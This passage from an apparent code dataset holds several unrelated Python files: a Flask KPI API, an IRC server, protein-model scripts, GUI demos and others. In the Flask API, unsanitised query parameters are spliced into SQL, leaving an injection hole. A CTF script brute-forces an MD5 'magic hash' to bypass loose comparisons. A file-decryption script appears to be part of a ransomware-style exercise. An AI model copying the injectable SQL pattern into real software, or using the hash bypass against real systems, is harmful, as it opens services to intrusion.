render(request,'analysis.html',{'msg':num_of_msg,'name':name,'user_messages':user_messages,'total_words':total_words,'links':links,'chart':chart,'chart2':chart2,\n 'chart3':chart3})\n return res","repo_name":"Aditya9329/WhatsAppChatAnalysis","sub_path":"WhatsApp/Analysis/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24507168908","text":"from __future__ import unicode_literals\nimport numpy as np\nimport matplotlib\nmatplotlib.rcParams['text.usetex'] = True\nmatplotlib.rcParams['text.latex.unicode'] = True\nimport matplotlib.pyplot as plt\n\nimport pandas as pd\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--input_file\", help=\"input txt file (ex. prob_volt.data\")\nparser.add_argument(\"--exp_file\", help=\"experimental data txt file (ex. prob_volt.data)\")\nparser.add_argument(\"--bp\", help=\"activate BP probes\", action='store_true')\nparser.add_argument(\"--plot\", help=\"activate plot\", action='store_true')\nargs = parser.parse_args()\n\ninput_file = args.input_file\n\n# Import Dataset\ndf = pd.read_csv(input_file, sep='\\s+', engine='python', skiprows=[1])\nkeys = df.columns.values.tolist()\n#print (\"keys=\", len(keys))\n\n# print (df['potential'])\n# df['U'] = df['potential'] - df['potential'][0]\n# print (df['U'])\n\n# Import Exp Data\nexp = pd.read_csv(args.exp_file, sep='\\s+', engine='python', skiprows=1)\nkeys = exp.columns.values.tolist()\n# print (keys)\n# print (exp['Ucoil1'])\n\nindex_max = 8\nif args.bp:\n index_max = 15\n\nUprobes = [] \noutput=\"\"\nheader=\"\"\nfor i in range(1,index_max):\n numkey = \"U%d\" % i\n Uprobes.append(\"Ucoil%d\" % i)\n exp[numkey] = exp.apply(lambda row: df['potential'][i] - df['potential'][i-1], axis=1)\n # print (numkey, (df['potential'][i] - df['potential'][i-1]))\n output += \"%s \" % str(df['potential'][i] - df['potential'][i-1])\n header += \"%s[V]\\t\" % numkey\nprint (header)\nprint (output)\n\nif args.plot: \n ax = plt.gca()\n # loop over key\n for key in Uprobes:\n numkey = key.replace(\"coil\",'')\n #print (key, numkey)\n if key in keys:\n exp.plot(x='Time', y=key, ax=ax)\n color = ax.get_lines()[-1].get_color() \n # print (\"color=\", color)\n exp.plot(x='Time', y=numkey, style=\"^\", markevery=800, color=color, ax=ax) #\n else:\n print( \"unknown key: %s\" % args.plot_vs_time )\n print( \"valid keys: \", keys )\n exit(1)\n plt.show()\n","repo_name":"feelpp/book.hifimagnet","sub_path":"docs/docs/modules/appendix/assets/examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"3016374094","text":"\"\"\"\nThis module provides the API functionality\n\"\"\"\n\nfrom flask import Flask\nfrom flask_mysqldb import MySQL\nimport json\nfrom datetime import datetime\nfrom flask import request\nimport time\nimport config\n\n# App Configuration\napp = Flask(__name__)\n\napp.config['MYSQL_USER'] = config.USER\napp.config['MYSQL_PASSWORD'] = config.PASSWORD\napp.config['MYSQL_HOST'] = config.HOST\napp.config['MYSQL_DB'] = config.DATABASE\napp.config['MYSQL_CURSORCLASS'] = 'DictCursor'\n\nmysql = MySQL(app)\n\n\ndef sql_condition():\n \"\"\"\n Returns the SQL condition corresponding to the request query string\n \"\"\"\n\n # Get parameters from query string\n args = request.args\n for k, v in args.items():\n print(f\"arg [{k}] = [{v}]\")\n\n # Construct a list of SQL conditions based on query string parameters\n conditions = []\n if \"from\" in args:\n value = args[\"from\"]\n dt_value = datetime.strptime(value, '%Y-%m-%d_%H:%M:%S')\n unixtime = int(time.mktime(dt_value.timetuple()) * 1000)\n print('converted', value, dt_value, unixtime)\n conditions.append(f\"(interval_start_timestamp >= {unixtime})\")\n if \"to\" in args:\n value = args[\"to\"]\n dt_value = datetime.strptime(value, '%Y-%m-%d_%H:%M:%S')\n unixtime = int(time.mktime(dt_value.timetuple()) * 1000)\n print('converted', value, dt_value, unixtime)\n conditions.append(f\"(interval_end_timestamp <= {unixtime})\")\n if \"interval\" in args:\n value = args[\"interval\"]\n conditions.append(f\"(`interval` = '{value}')\")\n\n # Construct the final condition (join the conditions in the list with AND)\n condition = \"\" if not conditions else \" WHERE \"+\" AND \".join(conditions)\n print(\"condition\", condition)\n\n # Return the final condition\n return condition\n\n\ndef db_results(sql):\n \"\"\"\n Runs the provided sql statement, and fetches the results in JSON format\n \"\"\"\n\n # Execute the SQL on the database and fetch the results\n cur = mysql.connection.cursor()\n cur.execute(sql)\n results = cur.fetchall()\n\n # Create output_rows list (transformed results for output)\n output_rows = []\n for result in results:\n result['interval_start_timestamp'] = datetime.fromtimestamp(\n result['interval_start_timestamp']/1000).strftime('%Y-%m-%d %H:%M:%S')\n result['interval_end_timestamp'] = datetime.fromtimestamp(\n result['interval_end_timestamp']/1000).strftime('%Y-%m-%d %H:%M:%S')\n output_rows.append(result)\n\n # Return json (based on transformed results)\n return json.dumps(output_rows)\n\n\n@app.route('/kpi1/', methods=['GET'])\ndef get_kpi1():\n \"\"\"\n Queries kpi1 database table and returns results in JSON format\n \"\"\"\n\n # Construct the SQL statement to run on the database\n sql = f'''\n SELECT * \n FROM kpi1 \n {sql_condition()}\n ORDER BY \n `interval`,\n interval_start_timestamp, \n interval_end_timestamp, \n total_bytes desc,\n service_id desc\n '''\n print(\"sql\", sql)\n\n # Run the SQL statement on the database and return results\n return db_results(sql)\n\n\n@app.route('/kpi2/', methods=['GET'])\ndef get_kpi2():\n \"\"\"\n Queries kpi2 database table and returns results in JSON format\n \"\"\"\n\n # Construct the SQL statement to run on the database\n sql = f'''\n SELECT * \n FROM kpi2\n {sql_condition()}\n ORDER BY \n `interval`,\n interval_start_timestamp, \n interval_end_timestamp, \n number_of_unique_users desc,\n cell_id desc\n '''\n print(\"sql\", sql)\n\n # Run the SQL statement on the database and return results\n return db_results(sql)\n","repo_name":"sgioldasis/pyspark-analysis-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"70503391264","text":"from __future__ import print_function, division\nimport logging\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s.%(msecs).03d %(name)s %(message)s\",\n datefmt='%Y-%m-%dT%H:%M:%S'\n)\n\nimport pandas\n\nimport numpy\n\nimport itertools\n\nimport jug\n\nfrom itertools import product, izip, chain\ndef dict_product(iterable_dict):\n return (dict(izip(iterable_dict, x)) for x in product(*iterable_dict.itervalues()))\n\n@jug.TaskGenerator\ndef model_cv_predictions(protease, parameters):\n import sklearn.cross_validation as cross_validation\n from sklearn.metrics import mean_squared_error\n import protease_experimental_analysis.sequence_protease_susceptibility as sequence_protease_susceptibility\n\n import data_constk_161218_rd1234\n import pandas as pd\n import numpy as np\n\n ssm_data = pandas.DataFrame.from_dict({\n \"sequence\" : map(str.strip, open('160924_grocklin_ssm2_myseqs').readlines())\n })\n\n ssm_data[\"pred_sequence\"] = [\"GGGSASHM\" + x + \"LEGGGSEQ\" + ('Z' * (46 - len(x))) for x in ssm_data.sequence.values]\n #newbg=pd.read_csv('ssm_mut_pred_logistic_upweight10_161224',delim_whitespace=True)\n bigtable_prot=pd.read_csv('big_ssm2_nextseq_table_known_frac_named',delim_whitespace=True,header=None)\n bigtable_prot=bigtable_prot[[0,1]]\n bigtable_prot.columns=['name','sequence']\n ssm=pd.merge(left=bigtable_prot, right=ssm_data,on='sequence',how='inner')\n\n ssm_lines=\"\"\"EEHEE_rd3_0037.pdb TTIKVNGQEYTVPLSPEQAAKAAKKRWPDYEVQIHGNTVKVTR\nEEHEE_rd3_1498.pdb GTLHLNGVTVKVPSLEKAIKAAKKFAKKYNLEVQVHGNTVHVH\nEEHEE_rd3_1702.pdb TTIHVGDLTLKYDNPKKAYEIAKKLAKKYNLTVTIKNGKITVT\nEEHEE_rd3_1716.pdb TEVHLGDIKLKYPNPEQAKKAAEKLAQKYNLTWTVIGDYVKIE\nEHEE_0882.pdb QETIEVEDEEEARRVAKELRKKGYEVKIERRGNKWHVHRT\nEHEE_rd2_0005.pdb TTRYRFTDEEEARRAAKEWARRGYQVHVTQNGTYWEVEVR\nEHEE_rd3_0015.pdb KTQYEYDTKEEAQKAYEKFKKQGIPVTITQKNGKWFVQVE\nHEEH_rd2_0779.pdb TLDEARELVERAKKEGTGVDVNGQRFEDWREAERWVREQEKNK\nHEEH_rd3_0223.pdb TIDEIIKALEQAVKDNKPIQVGNYTVTSADEAEKLAKKLKKEY\nHEEH_rd3_0726.pdb TELKKKLEEALKKGEEVRVKFNGIEIRITSEDAARKAVELLEK\nHEEH_rd3_0872.pdb TWQDLVKIAEKALEKGEPITINGITVTTKEQAKQAIEYLKKAY\nHHH_0142.pdb RKWEEIAERLREEFNINPEEAREAVEKAGGNEEEARRIVKKRL\nHHH_rd2_0134.pdb SKDEAQREAERAIRSGNKEEARRILEEAGYSPEQAERIIRKLG\nHHH_rd3_0138.pdb ERRKIEEIAKKLYQSGNPEAARRFLRKAGISEEEIERILQKAG\nPin1 MADEEKLPPGWEKRMSRSSGRVYYFNHITNASQWERPSG\nhYAP65 FEIPDDVPLPAGWEMAKTSSGQRYFKNHIDQTTTWQDPRKAMLSQM\nvillin LSDEDFKAVFGMTRSAFANLPLWKQQNLKKEKGLF\"\"\".split('\\n')\n wt_seqs={}\n for line in ssm_lines:\n wt_seqs[line.split()[0]] = line.split()[1]\n\n def wt(x):\n if '_wt' in x or x.split('_')[-1][-4:] in ['.pdb','AP65','llin','Pin1']:\n return x\n else:\n return '_'.join(x.split('_')[0:-1])\n ssm['my_wt'] = ssm['name'].map(wt)\n\n def delta_pred_vs_wt(wts, preds):\n wt_preds=dict(zip(wts, preds))\n return [wt_preds[wt] - pred for wt, pred in zip(wts, preds)]\n\n\n\n\n\n\n scramble_data = data_constk_161218_rd1234.scramble_data\n \n full_data = data_constk_161218_rd1234.full_df\n full_data[\"full_sequence\"] = \"GGGSASHM\" + full_data[\"sequence\"] + \"LEGGGSEQ\"\n max_len=max([len(x) for x in full_data[\"full_sequence\"].values])\n full_data[\"full_sequence\"] = [old_seq + ('Z' * (max_len - len(old_seq))) for old_seq in full_data[\"full_sequence\"].values]\n\n\n\n full_data_byprot = {\n t : full_data[full_data[\"protease\"] == t]\n for t in (protease,)\n }\n\n prottest={}\n\n full_data_byprot[protease]['prottest'] = ['prottest' in x for x in full_data_byprot[protease]['name']]\n prottest[protease] = full_data_byprot[protease].query('prottest == True')\n prottest[protease]['parent'] = [x.split('_prottest')[0] for x in prottest[protease]['name']]\n prottest[protease] = pd.merge(left=prottest[protease][['name','parent','ec50','full_sequence']],\n right=full_data_byprot[protease][['name','ec50','full_sequence']],\n left_on='parent',right_on='name',how='inner')\n prottest[protease]['delta_ec50'] = prottest[protease]['ec50_x'] - prottest[protease]['ec50_y']\n\n\n data = scramble_data.query(\"round != 'pdb' and protease == '%s'\" % protease).copy()\n model = sequence_protease_susceptibility.CenterLimitedPSSMModel(**dict(parameters))\n\n \n model.fit(list(data[\"full_sequence\"].values), data[\"ec50\"].values)\n \n ssm_preds = model.predict(list(ssm['pred_sequence']))\n delta_pred = delta_pred_vs_wt(ssm['my_wt'].values, ssm_preds)\n \n extras = {}\n extras['min_delta_vs_pred'] = min(delta_pred)\n extras['max_delta_vs_pred'] = max(delta_pred)\n extras['delta_pred'] = delta_pred\n extras['ssm_pred'] = ssm_preds\n\n prottest_pred_delta = (model.predict(list(prottest[protease]['full_sequence_x'])) - \n model.predict(list(prottest[protease]['full_sequence_y'])))\n\n extras['prottest_mse']= mean_squared_error(prottest_pred_delta, prottest[protease]['delta_ec50'])\n extras['prottest_R2'] = np.corrcoef(prottest_pred_delta, prottest[protease]['delta_ec50'])[0][1]**2.0\n extras['prottest_slope'] = np.polyfit(prottest_pred_delta, prottest[protease]['delta_ec50'], 1)[0]\n extras['fit_coeffs_'] = model.fit_coeffs_\n extras['cen_to_flank'] = max(abs(model.fit_coeffs_['seq_weights'][0:-1])) / max(abs(np.ravel(model.fit_coeffs_['weights'][0:-1,0:-1])))\n\n data[\"fit_pred_ec50\"] = model.predict(list(data[\"full_sequence\"].values))\n data[\"pred_ec50\"] = cross_validation.cross_val_predict(\n model, data[\"full_sequence\"], data[\"ec50\"], )\n\n return (data, extras)\n\nparam_space = {\n #alpha_center\" : numpy.exp(numpy.array([-6,-5.5,-5,-4.5,-4,-3.5])),\n \"alpha_center\" : numpy.exp(numpy.array([-15])),\n #\"alpha_flank\" : numpy.exp(numpy.array([-8,-7,-6.5,-6,-5.5,-5,-4.5,-4,-3.5,-3])),\n \"alpha_flank\" : numpy.exp(numpy.array([-15])),\n \"max_data_upweight\" : (1.0,),\n \"init_tot_l\" : (20,),\n \"init_max_sumweight\" : (10,),\n \"error_upper_lim\": (10,),\n \"flanking_window\": (1,2,3,4),\n}\n\nproteases = [\"tryp\",\"chymo\"]\n#proteases=[\"chymo\",]\nparameter_sets = [frozenset(d.items()) for d in dict_product(param_space)]\nmodel_results = { (d, p) : model_cv_predictions(d, p) for d, p in product(proteases, parameter_sets) }\n","repo_name":"asford/protease_experimental_analysis","sub_path":"workspace/sequence_protease_susceptibility_analysis.py","file_name":"sequence_protease_susceptibility_analysis.py","file_ext":"py","file_size_in_byte":6309,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"17463323206","text":"import socket\r\nfrom threading import Thread\r\nimport threading\r\nimport time\r\nimport platform\r\n\r\n# Creating the socket\r\nserversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nhost = \"10.0.42.17\"\r\n# host = \"\"\r\nport = 3456\r\nserversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\nserversocket.bind((host, port))\r\n# Prepare the initial client list\r\nclient_list = []\r\n# Prepare the initial channel list\r\nchannel_list = [\"#test\", \"#general\"]\r\n\r\n\r\n# ----- NOT IMPLIMENTED -----\r\n# Ping function sends a ping to users\r\n# def ping():\r\n# print(\"Pinging\")\r\n# for client in client_list:\r\n# print(\"Found a user \" + client.user)\r\n# ping = 'PING ' + client.user + '\\n'\r\n# client.sock.send(ping.encode())\r\n# resp = client.sock.recv(2 ** 10).decode()\r\n# if(\"PONG\" not in resp):\r\n# #For each client, send message that user has quit\r\n# for client2 in client_list:\r\n# message = ':' + client.nick + \"!\" + client.user + '@' + platform.node() + ' QUIT ' + client.nick + '\\n'\r\n# client2.sock.send(message.encode())\r\n# #Remove user from list of clients and then close the socket\r\n# client_list.remove(client)\r\n# client.sock.close()\r\n\r\n\r\n\r\n# The client class\r\nclass client(Thread):\r\n # Constructor for the client class\r\n def __init__(self, socket, address):\r\n Thread.__init__(self)\r\n self.sock = socket\r\n self.addr = address\r\n self.nick = \"\"\r\n self.user = \"\"\r\n self.channel = []\r\n self.start()\r\n\r\n def run(self):\r\n try:\r\n #While username and nickname not set\r\n while self.nick == \"\" and self.user == \"\":\r\n \r\n while self.user == \"\":\r\n # Read received data\r\n message = self.sock.recv(2 ** 10).decode()\r\n\r\n for line in message.splitlines():\r\n # print(line)\r\n messageParsed = line.split(' ')\r\n # Check if the client is sending a nickname parameter\r\n if(messageParsed[0] == \"NICK\"):\r\n if(messageParsed[1] != \"\"):\r\n global client_list\r\n for client in client_list:\r\n # If a nickname already exists, inform the user\r\n if messageParsed[1] == client.nick:\r\n message = self.nick + ' ' + messageParsed[1] + ':Nickname is already in use\\n'\r\n self.sock.send(message.encode())\r\n self.sock.close()\r\n return\r\n self.nick = messageParsed[1]\r\n else:\r\n self.sock.send(b'Invalid Paramater for NICK')\r\n\r\n # Check if the client is sending a username parameter\r\n if(messageParsed[0] == \"USER\"):\r\n if(messageParsed[1] != \"\"):\r\n self.user = messageParsed[1]\r\n else:\r\n self.sock.send(b'Invalid Paramater for USER')\r\n\r\n print(\"User: \" + self.user + \" Nick: \" + self.nick)\r\n if(self.nick != \"\" and self.user != \"\"):\r\n print(\"Adding \" + self.user + \" to client list\")\r\n client_list.append(self)\r\n\r\n # Constructing and sending the initial welcome messages\r\n REPLY_001 = ':' + host + ' 001 ' + self.nick + ' :Welcome to the IRC server!\\n'\r\n REPLY_002 = ':' + host + ' 002 ' + self.nick + ' :Your host is ' + 'Nox\\n'\r\n REPLY_003 = ':' + host + ' 003 ' + self.nick + ' :This server was created ..\\n'\r\n message = REPLY_001 + REPLY_002 + REPLY_003 + \"Join general by typing /join #general\\n\"\r\n \r\n self.sock.send(message.encode())\r\n \r\n while True:\r\n\r\n message = self.sock.recv(1024).decode()\r\n for line in message.splitlines():\r\n messageParsed = line.split(' ')\r\n\r\n #Join channel protocol\r\n if(messageParsed[0] == \"JOIN\"):\r\n found = False\r\n for channel in channel_list:\r\n if(messageParsed[1] == channel):\r\n found = True\r\n channel = messageParsed[1]\r\n\r\n #If channel not found, create channel with name\r\n if(not found):\r\n channel_list.append(channel)\r\n found = True\r\n\r\n #If channel found, send reply codes and broadcast to everyone in channel\r\n if (found):\r\n self.channel.append(channel)\r\n REPLY_331 = ':' + host + ' 331 ' + self.nick + ' ' + channel + ' :No topic is set\\n'\r\n REPLY_353 = ':' + host + ' 353 ' + self.nick + ' = ' + channel + ' :'\r\n\r\n #Add every client in channel to list of users\r\n for client in client_list:\r\n for clientChannel in client.channel:\r\n if(clientChannel == channel):\r\n REPLY_353 = REPLY_353 + ' ' + client.nick\r\n REPLY_353 = REPLY_353 + '\\n'\r\n\r\n REPLY_366 = ':' + host + ' 366 ' + self.nick + ' ' + channel + ' :End of NAMES list\\n'\r\n REPLY = ':' + self.nick + \"!\" + self.user + '@' + platform.node() + ' ' + line + '\\n'\r\n message = REPLY + REPLY_331 + REPLY_353 + REPLY_366\r\n print(message)\r\n\r\n #If client in channel, send message\r\n for client in client_list:\r\n for clientChannel in client.channel:\r\n if(clientChannel == channel):\r\n client.sock.send(message.encode())\r\n\r\n #Leave channel protocol\r\n if(messageParsed[0] == \"PART\"):\r\n if(self.channel):\r\n channel = messageParsed[1]\r\n message = ':' + self.nick + \"!\" + self.user + '@' + platform.node() + ' ' + line + '\\n'\r\n #For each client in channel, send message that user left\r\n for client in client_list:\r\n for clientChannel in client.channel:\r\n if(clientChannel == channel):\r\n client.sock.send(message.encode())\r\n #Remove channel frm users channel list\r\n self.channel.remove(channel)\r\n\r\n #Leave server protocol\r\n if(messageParsed[0] == \"QUIT\"):\r\n #For each client, send message that user has quit\r\n for client in client_list:\r\n message = ':' + self.nick + \"!\" + self.user + '@' + platform.node() + ' ' + line + '\\n'\r\n client.sock.send(message.encode())\r\n #Remove user from list of clients and then close the socket\r\n client_list.remove(self)\r\n self.sock.close()\r\n\r\n #Message protocol\r\n if(messageParsed[0] == \"PRIVMSG\"):\r\n channel = messageParsed[1]\r\n for client in client_list:\r\n \r\n #Message Channel\r\n for clientChannel in client.channel:\r\n if(clientChannel == channel):\r\n if (client != self):\r\n message = ':' + self.nick + \"!\" + self.user + '@' + platform.node() + ' ' + line + '\\n'\r\n client.sock.send(message.encode())\r\n\r\n\r\n #Message User\r\n if(messageParsed[1] == client.nick):\r\n if(messageParsed[2] != \":\"):\r\n if(messageParsed[1] != self.nick):\r\n message = ':' + self.nick + \"!\" + self.user + '@' + platform.node() + ' ' + line + '\\n'\r\n client.sock.send(message.encode())\r\n\r\n except socket.error:\r\n #If socket error, remove client from list then close socket connection\r\n client_list.remove(self)\r\n self.sock.close()\r\n return\r\n\r\n#Listen for client connections to server\r\nserversocket.listen(5)\r\nprint(\"Server started and Listening\")\r\n\r\nwhile True:\r\n clientsocket, address = serversocket.accept()\r\n client(clientsocket, address)\r\n \r\n # ----- NOT IMPLIMENTED -----\r\n # t = threading.Timer(5.0, lambda: ping())\r\n # t.daemon = True\r\n # t.start()\r\n","repo_name":"mariusurbelis/irc","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":9452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21058395076","text":"#!/usr/bin/env python\n\nimport gtk\n\ndistributions = [\"Ubuntu\", \"Debian\", \"Sabayon\", \"Fedora\", \"Arch\", \"Mint\", \"Slackware\", \"Mandriva\", \"Sidux\", \"Mepis\"]\n\nclass EntryCompletion:\n def __init__(self):\n window = gtk.Window()\n \n liststore = gtk.ListStore(str)\n for item in distributions:\n liststore.append([item])\n \n self.completion = gtk.EntryCompletion()\n self.completion.set_model(liststore)\n self.completion.set_text_column(0)\n\n comboboxentry = gtk.Entry()\n comboboxentry.set_completion(self.completion)\n \n window.connect(\"destroy\", lambda w: gtk.main_quit())\n\n window.add(comboboxentry)\n \n window.show_all()\n\nEntryCompletion()\ngtk.main()\n","repo_name":"Chiheb-Nexus/pygtk-tutorial","sub_path":"examples/entrycompletion.py","file_name":"entrycompletion.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10563069614","text":"import itertools\n\n\ndef main():\n L1= [13, 15, 12, 17, 15]\n L2 = [\"fifi\", \"riri\", \"loulou\"]\n # sans itertools\n L3 = []\n for i in range(len(L1)):\n L3.append(L1[i])\n if i < len(L2):\n L3.append(L2[i])\n\n # compréhension de liste ==> itertools\n #result = [x for x in itertools.chain.from_iterable(itertools.zip_longest(L1, L2)) if x]\n\n print(L3)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"juliencampus/python","sub_path":"Virginie/etape2_3.py","file_name":"etape2_3.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43579653575","text":"import os\nfrom cryptography.fernet import Fernet\n\nwith open('filekey.key', 'rb') as filekey: \n key = filekey.read()\n\nfernet = Fernet(key) \n\nfor path, subdirs, files in os.walk('./test'):\n for name in files:\n print(os.path.join(path, name))\n filepath = os.path.join(path, name)\n with open(filepath, 'rb') as enc_file: \n encrypted = enc_file.read() \n \n decrypted = fernet.decrypt(encrypted) \n \n with open(filepath, 'wb') as dec_file:\n dec_file.write(decrypted)\n filepath2=filepath.replace('.zooky','')\n os.rename(filepath, filepath2)\n \n\n","repo_name":"vogeaux/crypt_rew","sub_path":"dechiffrement_all.py","file_name":"dechiffrement_all.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28155629360","text":"import pytest\n\nfrom epilogue import models\n\nfrom django.urls import reverse\n\n\n@pytest.fixture\ndef user_creation_data():\n return {\n \"first_name\" : \"Shikhar\"\n }\n\n@pytest.fixture\ndef user():\n print(models.Customer.objects.count())\n return models.Customer.objects.first()\n\n@pytest.mark.django_db\ndef test_a_respond_201_when_user_onboards_only_with_name(client, user_creation_data):\n print(\"Executing test 1 *****\")\n response = client.post(\n reverse(\"user\"), user_creation_data\n )\n assert response.status_code == 201\n\n@pytest.mark.django_db\ndef a_test_b_respond_update_when_user_adds_gender(client,user):\n print(\"Executing test 2\")\n response = client.post(\n reverse(\"user-entry\", kwargs = {\"pk\":user.id}),\n {\n \"gender\": \"male\"\n },\n AUTHORIZATION = \"Token %d\"%user.auth_token.key\n )\n assert response.status_code == 200, \"Something Went wrong\"\n\n\n","repo_name":"dotslash227/98fitcortex","sub_path":"testing/epilogue/tests/integration/test_user_creation.py","file_name":"test_user_creation.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12188418722","text":"import hashlib\nimport re\n\ndef isTargetHashFound(digest):\n return re.match(\"0e[0-9]{30}\", digest.hex())\n\n\ndef nat():\n n = 0\n while True:\n yield n\n n = n + 1\n\nfor i in nat():\n if isTargetHashFound(hashlib.md5(bytes(\"f789bbc328a3d1a3\" + str(i) , \"ascii\")).digest()):\n print(\"cracked input: \", i)\n break\n\n","repo_name":"GintsEngelen/CTF","sub_path":"247CTF/Web/Compare the Pairs/Brute Force.py","file_name":"Brute Force.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18777307361","text":"import mph\nfrom jpype import JBoolean, JClass, JArray, JString\nimport time\n\n\ndef printElapsedTime(startTime, index):\n elapsedTime = time.time() - startTime\n minutes = int(elapsedTime // 60)\n seconds = int(elapsedTime % 60)\n print(f\"Until {index}: {minutes} minutes {seconds} seconds\")\n\n\ndef runSimulation(\n outer_contour_file_path,\n inner_contour_file_path=None,\n mesh_resolution=\"normal\",\n model_path=None,\n):\n # Pre\n print(f\"running simulation\")\n print(f\"mesh_resolution: {mesh_resolution}\")\n startTime = time.time()\n\n client = mph.start()\n # server = mph.Server(cores=1)\n\n # create the model.java\n model = client.create(\"Model\")\n\n model.java.modelPath(\"./\")\n\n # show Jpype the intention of using an integer with Integer()\n # this has to run after the model is created\n Integer = JClass(\"java.lang.Integer\")\n\n model.java.label(\"silver_plasmonic_nano_antenna.mph\")\n\n model.java.title(\"Silver Plasmonic Nano Antenna\")\n\n # Main\n model.java.param().set(\"w\", \"750[nm]\", \"Width of physical geometry\")\n model.java.param().set(\"w\", \"750[nm]\", \"Width of physical geometry\")\n model.java.param().set(\"t_pml\", \"150[nm]\", \"PML thickness\")\n model.java.param().set(\"h_air\", \"400[nm]\", \"Air domain height\")\n model.java.param().set(\"h_subs\", \"250[nm]\", \"Substrate domain height\")\n model.java.param().set(\"na\", \"1\", \"Refractive index, air\")\n model.java.param().set(\"nb\", \"1.5\", \"Refractive index, substrate\")\n model.java.param().set(\"lda0\", \"532[nm]\", \"Wavelength\")\n model.java.param().set(\"phi\", \"0\", \"Azimuthal angle of incidence in both media\")\n model.java.param().set(\"theta\", \"0\", \"Polar angle of incidence in air\")\n model.java.param().set(\n \"thetab\", \"asin(na/nb*sin(theta))\", \"Polar angle in substrate\"\n )\n model.java.param().set(\"I0\", \"1[W/m^2]\", \"Intensity of incident field\")\n model.java.param().set(\"P\", \"I0*w^2*cos(theta)\", \"Port power\")\n\n model.java.component().create(\"comp1\", JBoolean(True))\n\n model.java.component(\"comp1\").geom().create(\"geom1\", 3)\n\n model.java.result().table().create(\"tbl1\", \"Table\")\n model.java.result().table().create(\"tbl2\", \"Table\")\n\n model.java.component(\"comp1\").mesh().create(\"mesh1\")\n\n model.java.component(\"comp1\").geom(\"geom1\").selection().create(\n \"csel1\", \"CumulativeSelection\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").selection(\"csel1\").label(\n \"Physical Domains Geometry\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").create(\"blk1\", \"Block\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"selresult\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"pos\", [\"0\", \"0\", \"(h_air+t_pml)/2\"]\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\"base\", \"center\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"size\", [\"w+2*t_pml\", \"w+2*t_pml\", \"h_air+t_pml\"]\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"layername\", [\"Layer 1\"]\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").setIndex(\n \"layer\", \"t_pml\", 0\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"layerleft\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"layerright\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"layerfront\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"layerback\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"layerbottom\", JBoolean(False)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"layertop\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").create(\"blk2\", \"Block\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\n \"selresult\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\n \"pos\", [\"0\", \"0\", \"-(h_subs+t_pml)/2\"]\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\"base\", \"center\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\n \"size\", [\"w+2*t_pml\", \"w+2*t_pml\", \"h_subs+t_pml\"]\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\n \"layername\", [\"Layer 1\"]\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").setIndex(\n \"layer\", \"t_pml\", Integer(0)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\n \"layerleft\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\n \"layerright\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\n \"layerfront\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\n \"layerback\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").create(\"sel_pc1\", \"ExplicitSelection\")\n 